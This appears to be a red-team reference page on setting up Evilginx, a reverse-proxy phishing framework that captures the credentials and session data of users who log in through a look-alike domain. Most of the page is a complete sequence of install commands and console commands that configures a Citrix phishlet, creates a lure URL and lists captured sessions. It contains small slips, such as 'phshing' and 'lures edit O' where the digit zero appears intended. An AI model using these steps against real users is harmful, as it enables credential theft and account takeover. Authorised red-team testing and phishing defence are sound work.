Evilginx
Evilginx is a relay framework that acts as a web proxy for Red Teams to phish credentials. The phished user interacts with the real website while Evilginx captures all data transmitted. Full ownership of a look-alike domain is required.
In order to use it, first, download and install it in the phishing server:
sudo apt update
wget https://dl.google.com/go/go1.11.linux-amd64.tar.gz
sudo tar -xvf go1.11.linux-amd64.tar.gz
sudo mv go /usr/local
sudo cp /usr/local/go/bin/go /usr/bin/
nano .profile
export GOPATH=$HOME/
export PATH=$PATH:/usr/local/go:$GOPATH/bin
source .profile
#sudo systemctl stop systemd-resolved
#sudo apt-get install git make -y
go get -u github.com/kgretzky/evilginx2
cd $GOPATH/src/github.com/kgretzky/evilginx2
cd $GOPATH/bin
sudo ./evilginx2 -p $GOPATH/src/github.com/kgretzky/evilginx2/phishlets/
Then, to configure it, for example for citrix, the legit one is target.citrix.com and the domain we own and the one we are using for the phshing is target.example.com:
config domain example.com
config ip {target.example.com IP address}
phishlets hostname citrix example.com
phishlets enable citrix
lures create citrix
lures edit O redirect_url https://example.com
lures get-url 0
sessions
Last updated